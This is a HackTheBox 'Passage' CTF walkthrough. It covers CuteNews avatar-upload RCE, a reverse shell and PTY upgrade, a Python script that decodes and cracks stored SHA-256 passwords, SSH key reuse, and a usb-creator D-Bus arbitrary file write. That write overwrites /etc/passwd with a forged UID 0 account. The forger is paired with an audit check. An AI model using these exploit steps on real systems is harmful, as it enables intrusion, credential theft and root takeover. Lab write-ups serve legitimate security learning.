HackTheBox - Passage write up

Passage is a Medium Linux box.


As always, let's start with an nmap scan:

$ nmap -A -T4 -p -1024 -oN scan.nmap

22/tcp open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open, 22 and 80. OpenSSH 7.2p2 is the stock Ubuntu 16.04 package with no obvious quick win, so let's look at the web server.


Directory brute-forcing with gobuster is off the table: the site runs Fail2Ban, and a burst of 404s would get our IP banned. Clicking the orange RSS button shows that the site is built on CuteNews.

At the bottom of the page the CuteNews version is shown as 2.1.1. This release is vulnerable to RCE (Remote Code Execution) through the avatar upload: the upload only checks that the file starts with image magic bytes, not that it has an image extension, so a .php file that begins with a GIF header (GIF8;) followed by PHP code is stored under the web root and executed by the server when requested.

Right-clicking our new avatar and choosing "View Image" reveals the path where the uploaded PHP shell lives. Requesting it with a command (here id) returns the fake GIF header followed by the command output:

GIF8;
uid=33(www-data) gid=33(www-data) groups=33(www-data)


xanhacks~ $ nc -lvnp 4444
Connection from
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
python -c "import pty;pty.spawn('/bin/bash')"

We get a reverse shell, and the python one-liner upgrades it to a proper PTY.

User #1

There are two non-root users on the box.

paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash

After enumerating the box, I found multiple PHP files containing serialized PHP arrays. It took me a long time to find them because their contents are base64-encoded, not plaintext strings like "password" or "username" that are easy to grep for.

www-data@passage:/var/www/html/CuteNews/cdata$ ls users
09.php	1e.php	48.php	5d.php	78.php	b0.php	d4.php	f7.php
0a.php	21.php	4b.php	66.php	7a.php	b7.php	d5.php	fc.php
0c.php	32.php	50.php	6e.php	8f.php	c8.php	d6.php	lines
16.php	3d.php	52.php	77.php	97.php	d1.php	dd.php	users.txt
www-data@passage:/var/www/html/CuteNews/cdata$ cat users/b0.php
<?php die('Direct call - access denied'); ?>
base64decode(YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1...) =
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

We now have paul's password hash. Sixty-four hex characters and no salt prefix means plain, unsalted SHA-256, which CrackStation resolves instantly:
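As an added example (not code from the original post or from CuteNews), here is a small Python script that does what the manual steps above do: it strips the die() guard line from a cdata/users/*.php file, base64-decodes the rest, walks the PHP-serialized array with a minimal unserialize, and then tries the 64-hex-character hash against a wordlist as unsalted SHA-256. The file wrapper is rebuilt from the record shown above, and the wordlist is constructed; atlanta1 is included because that is the value the write-up got back from CrackStation.

```python
"""Parse a CuteNews cdata/users/*.php record and test its SHA-256 hash against a wordlist.

Added example for this write-up; not part of CuteNews or of the original post.
"""
import base64
import hashlib
import re
from typing import Iterable, Optional

# PHP-serialized record exactly as decoded in the write-up (paul's user entry).
PAUL_RECORD = (
    'a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";'
    's:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";'
    's:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";'
    's:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}'
)

# Constructed stand-in for cdata/users/b0.php: CuteNews prepends a die() guard and
# stores the base64 of the serialized array on the next line.
PAUL_FILE = (
    "<?php die('Direct call - access denied'); ?>\n"
    + base64.b64encode(PAUL_RECORD.encode()).decode()
    + "\n"
)


def php_unserialize(data: str, pos: int = 0):
    """Minimal PHP unserialize() for the types CuteNews uses (array, string, int,
    bool, float, null). Returns (value, position_after_value)."""
    t = data[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in ("i", "b", "d"):                       # i:123;  b:1;  d:1.5;
        end = data.index(";", pos)
        num = data[pos + 2:end]
        value = {"i": int, "b": lambda s: bool(int(s)), "d": float}[t](num)
        return value, end + 1
    if t == "s":                                   # s:<bytelen>:"...";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                          # skip :"
        # PHP lengths are byte counts, so slice on UTF-8 bytes, not characters
        raw = data[start:].encode()[:length].decode()
        end = start + len(raw)
        if data[end:end + 2] != '";':
            raise ValueError(f"bad string terminator at offset {end}")
        return raw, end + 2
    if t == "a":                                   # a:<count>:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        pos = colon + 2                            # skip :{
        result = {}
        for _ in range(count):
            key, pos = php_unserialize(data, pos)
            val, pos = php_unserialize(data, pos)
            result[key] = val
        if data[pos] != "}":
            raise ValueError(f"bad array terminator at offset {pos}")
        return result, pos + 1
    raise ValueError(f"unsupported PHP type {t!r} at offset {pos}")


def load_cutenews_user(file_contents: str) -> dict:
    """Drop the PHP guard line, base64-decode the payload, and return {username: record}."""
    payload = "".join(l for l in file_contents.splitlines() if not l.startswith("<?php"))
    decoded = base64.b64decode(payload.strip()).decode()
    tree, _ = php_unserialize(decoded)
    return tree["name"]


def sha256_hex(word: str) -> str:
    return hashlib.sha256(word.encode()).hexdigest()


def crack_sha256(hex_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """CuteNews stores unsalted SHA-256: hash each candidate and compare."""
    if not re.fullmatch(r"[0-9a-f]{64}", hex_hash):
        raise ValueError("not a lowercase hex SHA-256 digest")
    for word in wordlist:
        if sha256_hex(word) == hex_hash:
            return word
    return None


if __name__ == "__main__":
    for name, rec in load_cutenews_user(PAUL_FILE).items():
        print(name, rec["email"], "acl=" + rec["acl"], rec["pass"])
        # constructed mini wordlist; real runs would use rockyou or an online lookup
        print("cracked:", crack_sha256(rec["pass"], ["password", "passage", "atlanta1"]))
```

The same loader works on every file in cdata/users/, which is how nadav's hash turns up as well; only the wordlist decides what gets cracked.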

www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/cdata/users$ cd
paul@passage:~$ cat user.txt

I found the hash for the nadav user too, but I could not crack it.

User #2

Paul's ~/.ssh directory contains a private key whose public half is tagged nadav@passage, so it is nadav's own key pair sitting in paul's home. Easy :)

paul@passage:~$ ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
paul@passage:~$ ls -alR
[...]
./.ssh:
total 24
drwxr-xr-x  2 paul paul 4096 Jul 21 10:43 .
drwxr-x--- 17 paul paul 4096 Dec 28 06:32 ..
-rw-r--r--  1 paul paul  395 Jul 21 10:43 authorized_keys
-rw-------  1 paul paul 1679 Jul 21 10:43 id_rsa
-rw-r--r--  1 paul paul  395 Jul 21 10:43 id_rsa.pub
-rw-r--r--  1 paul paul 1312 Jul 21 10:44 known_hosts

paul@passage:~$ cat .ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~$ ssh -i .ssh/id_rsa nadav@localhost
Last login: Mon Dec 28 08:18:26 2020 from
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)


Looking at the process list, we find this Python script running as root.

nadav@passage:~$ ps -aux
root       2559  0.2  0.4 159044 18460 ?        Sl   13:05   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

The script imports the dbus module, so it exposes a D-Bus service. We can enumerate the system bus and introspect the service with busctl.

nadav@passage:/dev/shm$ busctl list
com.ubuntu.USBCreator  2559 usb-creator-hel root :1.67 dbus.service     ...     
nadav@passage:/dev/shm$ busctl tree com.ubuntu.USBCreator

The bus policy is defined in /etc/dbus-1/system.d/. For this service only root may own the name, but the default policy lets any user send messages to it; the only remaining gate is the PolicyKit check inside the helper:

nadav@passage:/etc/dbus-1/system.d$ cat com.ubuntu.USBCreator.conf 
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"
 "http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd">
<busconfig>

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>
  </policy>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="com.ubuntu.USBCreator"/>
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Introspectable"/>
    <allow send_destination="com.ubuntu.USBCreator"
           send_interface="org.freedesktop.DBus.Properties"/>
  </policy>

</busconfig>


After searching around I found an article on this helper. It explains that the Image method exposed by usb-creator-helper copies an arbitrary source file to an arbitrary destination as root, and that its PolicyKit check does not prompt for a password, so any local user can overwrite any file on the filesystem.

So I copy the current /etc/passwd to /dev/shm, add my own toto user with UID 0 and an MD5-crypt hash from openssl passwd -1 in the password field, then have the helper write the file back over /etc/passwd.

$ openssl passwd -1
Password: toto
Verifying - Password: toto

nadav@passage:/dev/shm$ cp /etc/passwd passwd
nadav@passage:/dev/shm$ vim passwd # add toto
nadav@passage:/dev/shm$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image $PWD/passwd /etc/passwd true
nadav@passage:/dev/shm$ cat /etc/passwd
nadav@passage:/dev/shm$ su toto
Password: toto
root@passage:/dev/shm# cat /root/root.txt 
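An added Python example (not from the original post) covering the file we hand to the helper and the check a defender would run afterwards: it builds the forged /etc/passwd from a constructed excerpt plus a placeholder for the openssl passwd -1 output, then audits a passwd file for extra UID 0 accounts and for hashes stored inline instead of in /etc/shadow, which is exactly the footprint this technique leaves. The sample entries and the hash string are constructed, not taken from the box; the gdbus call in the comment is the one from the write-up.

```python
"""Forge a root-equivalent /etc/passwd entry and detect that kind of tampering.

Added example for this write-up, not from the original post or from usb-creator.
"""
from typing import Dict, List

# Constructed excerpt of /etc/passwd; not copied from the box.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nadav:x:1000:1000:Nadav,,,:/home/nadav:/bin/bash
paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash
"""

# Placeholder for the output of `openssl passwd -1` (MD5-crypt, "$1$salt$hash").
# The real value is whatever the command printed; this string is constructed.
TOTO_HASH = "$1$saltsalt$constructedhashvaluexxxxxxxxxx"

FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd(5) lines into their seven colon-separated fields."""
    entries = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(parts)}")
        entries.append(dict(zip(FIELDS, parts)))
    return entries


def forge_passwd(text: str, user: str, pw_hash: str) -> str:
    """Return the contents the write-up writes over /etc/passwd: the original file
    plus a UID 0 / GID 0 user carrying its hash inline. su(1) and login(1) honour a
    hash in the passwd field when it is not 'x', so /etc/shadow is never touched."""
    if ":" in user or ":" in pw_hash:
        raise ValueError("':' is the field separator and may not appear in a field")
    base = text if text.endswith("\n") else text + "\n"
    return base + f"{user}:{pw_hash}:0:0:root:/root:/bin/bash\n"


def audit_passwd(text: str) -> List[str]:
    """Findings a defender wants from /etc/passwd: UID 0 accounts other than root,
    empty password fields, and hashes stored inline (shadow bypass)."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: UID 0 account other than root")
        if e["passwd"] == "":
            findings.append(f"{e['name']}: empty password field, login without a password")
        elif e["passwd"] not in ("x", "*", "!", "!!"):
            findings.append(f"{e['name']}: hash in /etc/passwd, bypasses /etc/shadow")
    return findings


if __name__ == "__main__":
    forged = forge_passwd(SAMPLE_PASSWD, "toto", TOTO_HASH)
    print(forged)
    # Write `forged` to /dev/shm/passwd, then, as in the write-up:
    # gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator \
    #   --method com.ubuntu.USBCreator.Image /dev/shm/passwd /etc/passwd true
    for finding in audit_passwd(forged):
        print("AUDIT:", finding)
```

Running audit_passwd against a clean file returns nothing, so it doubles as a cheap integrity check to schedule after any incident involving a root-level file write.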
